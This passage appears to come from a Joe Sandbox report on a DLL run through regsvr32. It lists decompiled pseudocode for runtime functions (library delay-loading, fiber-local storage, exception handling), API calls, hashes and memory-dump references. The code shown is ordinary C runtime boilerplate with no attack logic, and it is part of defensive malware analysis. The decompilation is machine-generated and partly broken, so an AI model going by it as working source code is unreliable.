                                                                                                  • Instruction Fuzzy Hash: C0E1B272604B888AEBA6DF66D4423DD77A4F749BC8F008116FE8957B96CF34D698C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018000A3DC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 77%
                                                                                                  			E0000000118000A3DC(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				void* _t35;
				signed long long _t56;
				intOrPtr _t60;
				void* _t71;
				signed long long _t72;
				long long _t78;
				void* _t82;
				signed long long _t88;
				signed long long _t89;
				signed long long _t90;
				WCHAR* _t91;
				long _t94;
				void* _t97;
				WCHAR* _t102;

				 *((long long*)(_t82 + 8)) = __rbx;
				 *((long long*)(_t82 + 0x10)) = _t78;
				 *((long long*)(_t82 + 0x18)) = __rsi;
				r15d = __ecx;
				_t72 = _t71 | 0xffffffff;
				_t89 =  *0x80021010; // 0x5388a1408558
				_t88 =  *(0x180000000 + 0x226f0 + _t102 * 8) ^ _t89;
				asm("dec ecx");
				if (_t88 == _t72) goto 0x8000a51f;
				if (_t88 == 0) goto 0x8000a441;
				_t56 = _t88;
				goto 0x8000a521;
				if (__r8 == __r9) goto 0x8000a504;
				_t60 =  *((intOrPtr*)(0x180000000 + 0x22640 + __rsi * 8));
				if (_t60 == 0) goto 0x8000a469;
				if (_t60 != _t72) goto 0x8000a55e;
				goto 0x8000a4f0;
				r8d = 0x800;
				LoadLibraryExW(_t102, _t97, _t94);
				if (_t56 != 0) goto 0x8000a53e;
				if (GetLastError() != 0x57) goto 0x8000a4de;
				_t14 = _t56 - 0x50; // -80
				_t35 = _t14;
				r8d = _t35;
				if (E00000001180007070(__r8) == 0) goto 0x8000a4de;
				r8d = _t35;
				if (E00000001180007070(__r8) == 0) goto 0x8000a4de;
				r8d = 0;
				LoadLibraryExW(_t91, _t71);
				if (_t56 != 0) goto 0x8000a53e;
				 *((intOrPtr*)(0x180000000 + 0x22640 + __rsi * 8)) = _t72;
				if (__r8 + 4 != __r9) goto 0x8000a44a;
				_t90 =  *0x80021010; // 0x5388a1408558
				asm("dec eax");
				 *(0x180000000 + 0x226f0 + _t102 * 8) = _t72 ^ _t90;
				return 0;
			}

















                                                                                                  0x18000a3dc
                                                                                                  0x18000a3e1
                                                                                                  0x18000a3e6
                                                                                                  0x18000a3f8
                                                                                                  0x18000a402
                                                                                                  0x18000a418
                                                                                                  0x18000a41f
                                                                                                  0x18000a428
                                                                                                  0x18000a42e
                                                                                                  0x18000a437
                                                                                                  0x18000a439
                                                                                                  0x18000a43c
                                                                                                  0x18000a444
                                                                                                  0x18000a44d
                                                                                                  0x18000a459
                                                                                                  0x18000a45e
                                                                                                  0x18000a464
                                                                                                  0x18000a476
                                                                                                  0x18000a47c
                                                                                                  0x18000a488
                                                                                                  0x18000a497
                                                                                                  0x18000a499
                                                                                                  0x18000a499
                                                                                                  0x18000a49f
                                                                                                  0x18000a4b0
                                                                                                  0x18000a4b2
                                                                                                  0x18000a4c6
                                                                                                  0x18000a4c8
                                                                                                  0x18000a4d0
                                                                                                  0x18000a4dc
                                                                                                  0x18000a4e8
                                                                                                  0x18000a4f7
                                                                                                  0x18000a4fd
                                                                                                  0x18000a511
                                                                                                  0x18000a517
                                                                                                  0x18000a53d

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressFreeLibraryProc
                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                  • API String ID: 3013587201-537541572
                                                                                                  • Opcode ID: 4973cf4a17c5a6c0ea837db478b6f4f53bca8011a61d94df8f11c1c7fa6ad517
                                                                                                  • Instruction ID: 4cb29e05f73c92bcfdeebd25cdbb701ff5eb44b215489781f60aaecc25d2491e
                                                                                                  • Opcode Fuzzy Hash: 4973cf4a17c5a6c0ea837db478b6f4f53bca8011a61d94df8f11c1c7fa6ad517
                                                                                                  • Instruction Fuzzy Hash: ED41D032715A0856FBA7CB16AC047D53391B78EBE0F09C225BD1D47798EE38C64D8300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800045BC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 50%
                                                                                                  			E000000011800045BC(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				struct HINSTANCE__* _t81;
				long long _t85;
				void* _t89;
				struct HINSTANCE__* _t94;
				long _t97;
				void* _t100;
				signed long long _t101;
				WCHAR* _t104;

				 *((long long*)(_t89 + 8)) = __rbx;
				 *((long long*)(_t89 + 0x10)) = _t85;
				 *((long long*)(_t89 + 0x18)) = __rsi;
				_t101 = _t100 | 0xffffffff;
				_t61 =  *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8));
				if (_t61 == _t101) goto 0x800046eb;
				if (_t61 != 0) goto 0x800046ed;
				if (__r8 == __r9) goto 0x800046e3;
				_t67 =  *((intOrPtr*)(0x180000000 + 0x221f0 + __rsi * 8));
				if (_t67 == 0) goto 0x8000462e;
				if (_t67 != _t101) goto 0x800046c5;
				goto 0x80004699;
				r8d = 0x800;
				LoadLibraryExW(_t104, _t100, _t97);
				_t68 = _t61;
				if (_t61 != 0) goto 0x800046a5;
				if (GetLastError() != 0x57) goto 0x80004687;
				_t14 = _t68 + 7; // 0x7
				r8d = _t14;
				if (E00000001180007070(__r8) == 0) goto 0x80004687;
				r8d = 0;
				LoadLibraryExW(??, ??, ??);
				if (_t61 != 0) goto 0x800046a5;
				 *((intOrPtr*)(0x180000000 + 0x221f0 + __rsi * 8)) = _t101;
				goto 0x8000460c;
				_t21 = 0x180000000 + 0x221f0 + __rsi * 8;
				_t65 =  *_t21;
				 *_t21 = _t61;
				if (_t65 == 0) goto 0x800046c5;
				FreeLibrary(_t94);
				GetProcAddress(_t81);
				if (_t65 == 0) goto 0x800046e3;
				 *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8)) = _t65;
				goto 0x800046ed;
				 *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8)) = _t101;
				return 0;
			}















                                                                                                  0x1800045bc
                                                                                                  0x1800045c1
                                                                                                  0x1800045c6
                                                                                                  0x1800045e1
                                                                                                  0x1800045ee
                                                                                                  0x1800045fa
                                                                                                  0x180004603
                                                                                                  0x18000460c
                                                                                                  0x180004615
                                                                                                  0x180004621
                                                                                                  0x180004626
                                                                                                  0x18000462c
                                                                                                  0x18000463b
                                                                                                  0x180004641
                                                                                                  0x180004647
                                                                                                  0x18000464d
                                                                                                  0x180004658
                                                                                                  0x18000465a
                                                                                                  0x18000465a
                                                                                                  0x18000466f
                                                                                                  0x180004671
                                                                                                  0x180004679
                                                                                                  0x180004685
                                                                                                  0x180004691
                                                                                                  0x1800046a0
                                                                                                  0x1800046af
                                                                                                  0x1800046af
                                                                                                  0x1800046af
                                                                                                  0x1800046ba
                                                                                                  0x1800046bf
                                                                                                  0x1800046cb
                                                                                                  0x1800046d4
                                                                                                  0x1800046d9
                                                                                                  0x1800046e1
                                                                                                  0x1800046e3
                                                                                                  0x180004709

                                                                                                  APIs
                                                                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 0000000180004641
                                                                                                  • GetLastError.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 000000018000464F
                                                                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 0000000180004679
                                                                                                  • FreeLibrary.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 00000001800046BF
                                                                                                  • GetProcAddress.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 00000001800046CB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                  • String ID: api-ms-
                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                  • Opcode ID: d92b391dc074c551f2fff15d3caa28434169fc5b46989934520673f65e9ea010
                                                                                                  • Instruction ID: a281eee05f5572a15ea3fe0403c4f12dabc44bbec878773a6143b276462e3048
                                                                                                  • Opcode Fuzzy Hash: d92b391dc074c551f2fff15d3caa28434169fc5b46989934520673f65e9ea010
                                                                                                  • Instruction Fuzzy Hash: 9F31F276302B48A1EE93DB02A8007D533E4B70DBE4F598625BE2D0B3A0EF39C24C8705
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180007DB8 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Value$ErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 2506987500-0
                                                                                                  • Opcode ID: 5bc48b536716d6500d6b4fd732b8b14869dbb673373b5a9a242e628548633fb8
                                                                                                  • Instruction ID: c3c6b15d1e2a8e36adeeaa1ee2c0ab8803bf36c1bad1bc725f34006b2089cb00
                                                                                                  • Opcode Fuzzy Hash: 5bc48b536716d6500d6b4fd732b8b14869dbb673373b5a9a242e628548633fb8
                                                                                                  • Instruction Fuzzy Hash: A5214F3470668C42FAE7E73195553ED72926B6C7F0F58C624B83A07BDBDE6C8A494700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018000F374 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                  • String ID: CONOUT$
                                                                                                  • API String ID: 3230265001-3130406586
                                                                                                  • Opcode ID: 5f84935fb18113dc5388fb9af56135c4a8d61c8a22428d4b494f05fe971ce8aa
                                                                                                  • Instruction ID: 0de398e34c1669cec19602a54f8a011ae7faefe96049ea3591aa14d2bab58b4a
                                                                                                  • Opcode Fuzzy Hash: 5f84935fb18113dc5388fb9af56135c4a8d61c8a22428d4b494f05fe971ce8aa
                                                                                                  • Instruction Fuzzy Hash: 7F115B31610F4886E7939B52F85439A73A0F79CBE4F048225FA5E87BA4CF78CA488740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180007F30 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,?,00005388A1408558,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007F3F
                                                                                                  • FlsSetValue.KERNEL32(?,?,00005388A1408558,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007F75
                                                                                                  • FlsSetValue.KERNEL32(?,?,00005388A1408558,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FA2
                                                                                                  • FlsSetValue.KERNEL32(?,?,00005388A1408558,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FB3
                                                                                                  • FlsSetValue.KERNEL32(?,?,00005388A1408558,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FC4
                                                                                                  • SetLastError.KERNEL32(?,?,00005388A1408558,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FDF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Value$ErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 2506987500-0
                                                                                                  • Opcode ID: eb8af4af359d96366aaa10eae491533e56ca08d7f11ac2249f998e933b1e40b3
                                                                                                  • Instruction ID: b3640c739d53f521f3aff5ec24f9b4829142f54ff52cb57a8f227eaee239dcc8
                                                                                                  • Opcode Fuzzy Hash: eb8af4af359d96366aaa10eae491533e56ca08d7f11ac2249f998e933b1e40b3
                                                                                                  • Instruction Fuzzy Hash: 72115C3070964942FAEBE32195453F972926B9C7F0F18C625B83A077DBDE68C6498701
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180014C90 Relevance: 9.0, APIs: 6, Instructions: 45windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LoadMessage$StringTranslate$AcceleratorClassCreateCursorDispatchRegisterWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 1967609040-0
                                                                                                  • Opcode ID: 75c1782b7f7e477433b17d4cbabed80ab7ba6ec157a4fc5f42b14144684d98ab
                                                                                                  • Instruction ID: 677205889e0bc738131920ca4d71d6e0d0c6d5bcb4ac294ec7d30bf60c9b59c6
                                                                                                  • Opcode Fuzzy Hash: 75c1782b7f7e477433b17d4cbabed80ab7ba6ec157a4fc5f42b14144684d98ab
                                                                                                  • Instruction Fuzzy Hash: 8611B932614E89D2E7A2DB61F8517DA7361F7D8784F508121FA8947A79DF3CC7198B00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180003B5C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 63%
                                                                                                  			E00000001180003B5C(void* __esi, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
				signed int _v32;
				long long _v40;
				char _v48;
				signed int* _v56;
				void* _t55;
				intOrPtr _t60;
				signed int _t101;
				void* _t109;
				intOrPtr _t111;
				signed int* _t115;
				intOrPtr* _t136;
				void* _t139;
				void* _t142;
				void* _t144;
				void* _t158;
				void* _t159;

				_t109 = _t144;
				 *((long long*)(_t109 + 8)) = __rbx;
				 *((long long*)(_t109 + 0x10)) = __rbp;
				 *((long long*)(_t109 + 0x18)) = __rsi;
				 *((long long*)(_t109 + 0x20)) = __rdi;
				_t136 = __rcx;
				_t139 = __r9;
				_t159 = __r8;
				_t142 = __rdx;
				E00000001180004584(_t55, __r8);
				E00000001180002D40(_t109);
				_t115 = _a40;
				if ( *((intOrPtr*)(_t109 + 0x40)) != 0) goto 0x80003bde;
				if ( *__rcx == 0xe06d7363) goto 0x80003bde;
				if ( *__rcx != 0x80000029) goto 0x80003bc2;
				if ( *((intOrPtr*)(__rcx + 0x18)) != 0xf) goto 0x80003bc6;
				if ( *((long long*)(__rcx + 0x60)) == 0x19930520) goto 0x80003bde;
				if ( *__rcx == 0x80000026) goto 0x80003bde;
				if (( *_t115 & 0x1fffffff) - 0x19930522 < 0) goto 0x80003bde;
				if ((_t115[9] & 0x00000001) != 0) goto 0x80003d6d;
				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0x80003c76;
				if (_t115[1] == 0) goto 0x80003d6d;
				if (_a48 != 0) goto 0x80003d6d;
				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0x80003c63;
				if ( *__rcx != 0x80000026) goto 0x80003c41;
				_t60 = E00000001180002F2C(_t115, __r9,  *((intOrPtr*)(__r9 + 0x20)), __r9);
				if (_t60 - 0xffffffff < 0) goto 0x80003d8d;
				if (_t60 - _t115[1] >= 0) goto 0x80003d8d;
				r9d = _t60;
				E000000011800040F0(_t109, _t142, __r9, _t115);
				goto 0x80003d6d;
				if ( *_t136 != 0x80000029) goto 0x80003c63;
				r9d =  *((intOrPtr*)(_t136 + 0x38));
				if (r9d - 0xffffffff < 0) goto 0x80003d8d;
				if (r9d - _t115[1] >= 0) goto 0x80003d8d;
				goto 0x80003c31;
				E00000001180002004(r9d - _t115[1], _t109, _t115, __r9, __r9, _t115);
				goto 0x80003d6d;
				if (_t115[3] != 0) goto 0x80003cbe;
				if (( *_t115 & 0x1fffffff) - 0x19930521 < 0) goto 0x80003c9e;
				_t101 = _t115[8];
				if (_t101 == 0) goto 0x80003c9e;
				E00000001180002408(_t109);
				if (_t101 != 0) goto 0x80003cbe;
				if (( *_t115 & 0x1fffffff) - 0x19930522 < 0) goto 0x80003d6d;
				if ((_t115[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80003d6d;
				if ( *_t136 != 0xe06d7363) goto 0x80003d34;
				if ( *((intOrPtr*)(_t136 + 0x18)) - 3 < 0) goto 0x80003d34;
				if ( *((intOrPtr*)(_t136 + 0x20)) - 0x19930522 <= 0) goto 0x80003d34;
				_t111 =  *((intOrPtr*)(_t136 + 0x30));
				if ( *((intOrPtr*)(_t111 + 8)) == 0) goto 0x80003d34;
				E0000000118000241C(_t111);
				if (_t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)) == 0) goto 0x80003d34;
				_v32 = _a64 & 0x000000ff;
				_v40 = _a56;
				_v48 = _a48;
				_v56 = _t115;
				 *0x80016370(_t158);
				goto 0x80003d72;
				_v32 = _a56;
				_v40 = _a48;
				_v48 = _a64;
				_v56 = _t115;
				E00000001180003328(_a64 & 0x000000ff, 0x80000026, __esi, _t136, _t142, _t159, _t139, _t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)));
				return 1;
			}



















                                                                                                  0x180003b5c
                                                                                                  0x180003b5f
                                                                                                  0x180003b63
                                                                                                  0x180003b67
                                                                                                  0x180003b6b
                                                                                                  0x180003b75
                                                                                                  0x180003b78
                                                                                                  0x180003b7e
                                                                                                  0x180003b81
                                                                                                  0x180003b84
                                                                                                  0x180003b89
                                                                                                  0x180003b8e
                                                                                                  0x180003ba4
                                                                                                  0x180003bac
                                                                                                  0x180003bb0
                                                                                                  0x180003bb6
                                                                                                  0x180003bc0
                                                                                                  0x180003bc4
                                                                                                  0x180003bd2
                                                                                                  0x180003bd8
                                                                                                  0x180003be2
                                                                                                  0x180003bec
                                                                                                  0x180003bfa
                                                                                                  0x180003c04
                                                                                                  0x180003c08
                                                                                                  0x180003c14
                                                                                                  0x180003c1c
                                                                                                  0x180003c25
                                                                                                  0x180003c2b
                                                                                                  0x180003c37
                                                                                                  0x180003c3c
                                                                                                  0x180003c43
                                                                                                  0x180003c45
                                                                                                  0x180003c4d
                                                                                                  0x180003c57
                                                                                                  0x180003c61
                                                                                                  0x180003c6c
                                                                                                  0x180003c71
                                                                                                  0x180003c7a
                                                                                                  0x180003c88
                                                                                                  0x180003c8a
                                                                                                  0x180003c8e
                                                                                                  0x180003c90
                                                                                                  0x180003c9c
                                                                                                  0x180003caa
                                                                                                  0x180003cb8
                                                                                                  0x180003cc4
                                                                                                  0x180003cca
                                                                                                  0x180003cd3
                                                                                                  0x180003cd5
                                                                                                  0x180003cdd
                                                                                                  0x180003cdf
                                                                                                  0x180003cf2
                                                                                                  0x180003d09
                                                                                                  0x180003d18
                                                                                                  0x180003d20
                                                                                                  0x180003d27
                                                                                                  0x180003d2c
                                                                                                  0x180003d32
                                                                                                  0x180003d3f
                                                                                                  0x180003d51
                                                                                                  0x180003d5f
                                                                                                  0x180003d63
                                                                                                  0x180003d68
                                                                                                  0x180003d8c

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record__std_exception_copy
                                                                                                  • String ID: csm$csm
                                                                                                  • API String ID: 851805269-3733052814
                                                                                                  • Opcode ID: ae528b8b242bffcc2854918ec9a27d0bb976d941c4d1a74ac96dd6768b11b5c3
                                                                                                  • Instruction ID: ef6ae88387dfa06c815bde898961dd69fb07e80911919095ce8a45e838d8869a
                                                                                                  • Opcode Fuzzy Hash: ae528b8b242bffcc2854918ec9a27d0bb976d941c4d1a74ac96dd6768b11b5c3
                                                                                                  • Instruction Fuzzy Hash: C5617F3220078886EBB6CF26E44539877A9F758BD4F18C116EB9847BD5CF38D699C701
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180002A84 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 30%
                                                                                                  			E00000001180002A84(void* __rax, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __r8, intOrPtr* __r9) {
				void* _t76;
				void* _t83;
				void* _t84;
				intOrPtr _t101;
				intOrPtr _t103;
				void* _t113;
				void* _t118;
				void* _t130;
				long long _t133;
				intOrPtr* _t135;
				signed long long _t144;
				void* _t150;
				signed long long _t154;
				void* _t156;
				long long _t158;
				intOrPtr* _t159;
				void* _t161;
				void* _t162;
				signed long long _t166;
				void* _t170;
				intOrPtr _t171;
				void* _t173;
				void* _t174;
				void* _t176;
				void* _t178;
				void* _t180;
				intOrPtr* _t181;

				_t130 = __rax;
				 *((long long*)(_t161 + 8)) = __rbx;
				 *((long long*)(_t161 + 0x10)) = _t158;
				 *((long long*)(_t161 + 0x18)) = __rsi;
				_t162 = _t161 - 0x40;
				_t159 = __rcx;
				_t181 = __r9;
				_t174 = __rdx;
				E00000001180004584(_t76, __r8);
				_t171 =  *((intOrPtr*)(__r9 + 8));
				_t135 =  *((intOrPtr*)(__r9 + 0x38));
				_t178 =  *__r9 - _t171;
				_t103 =  *((intOrPtr*)(__r9 + 0x48));
				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0x80002bac;
				 *((long long*)(_t162 + 0x30)) = __rcx;
				 *((long long*)(_t162 + 0x38)) = __r8;
				if (_t103 -  *_t135 >= 0) goto 0x80002c58;
				_t154 = __r8 + __r8;
				if (_t178 - _t130 < 0) goto 0x80002b9e;
				if (_t178 - _t130 >= 0) goto 0x80002b9e;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t154 * 8)) == 0) goto 0x80002b9e;
				if ( *((intOrPtr*)(_t135 + 0xc + _t154 * 8)) == 1) goto 0x80002b2a;
				_t113 =  *((long long*)(_t130 + _t171))(_t180, _t176, _t173, _t170, _t150);
				if (_t113 < 0) goto 0x80002ba5;
				if (_t113 <= 0) goto 0x80002b9e;
				if ( *((intOrPtr*)(__rcx)) != 0xe06d7363) goto 0x80002b5b;
				if ( *0x800164f8 == 0) goto 0x80002b5b;
				if (E0000000118000F7F0(_t130 + _t171, _t135, 0x800164f8) == 0) goto 0x80002b5b;
				_t83 =  *0x800164f8();
				r8d = 1;
				_t84 = E00000001180004550(_t83, _t159 + _t171, _t174);
				_t101 =  *((intOrPtr*)(_t135 + 0x10 + _t154 * 8));
				r9d =  *_t159;
				 *((long long*)(_t162 + 0x28)) =  *((intOrPtr*)(_t181 + 0x40));
				_t133 =  *((intOrPtr*)(_t181 + 0x28));
				 *((long long*)(_t162 + 0x20)) = _t133;
				__imp__RtlUnwindEx();
				E00000001180004580(_t84);
				goto 0x80002ada;
				goto 0x80002c5d;
				_t156 =  *((intOrPtr*)(_t181 + 0x20)) - _t171;
				goto 0x80002c4e;
				_t144 = _t174 + _t174;
				if (_t178 - _t133 < 0) goto 0x80002c4c;
				_t118 = _t178 - _t133;
				if (_t118 >= 0) goto 0x80002c4c;
				r10d =  *(_t159 + 4);
				r10d = r10d & 0x00000020;
				if (_t118 == 0) goto 0x80002c21;
				r9d = 0;
				if (_t101 == 0) goto 0x80002c1c;
				r8d = r9d;
				_t166 = _t159 + _t159;
				if (_t156 - _t133 < 0) goto 0x80002c14;
				if (_t156 - _t133 >= 0) goto 0x80002c14;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t166 * 8)) !=  *((intOrPtr*)(_t135 + 0x10 + _t144 * 8))) goto 0x80002c14;
				if ( *((intOrPtr*)(_t135 + 0xc + _t166 * 8)) ==  *((intOrPtr*)(_t135 + 0xc + _t144 * 8))) goto 0x80002c1c;
				r9d = r9d + 1;
				if (r9d - _t101 < 0) goto 0x80002be4;
				if (r9d != _t101) goto 0x80002c58;
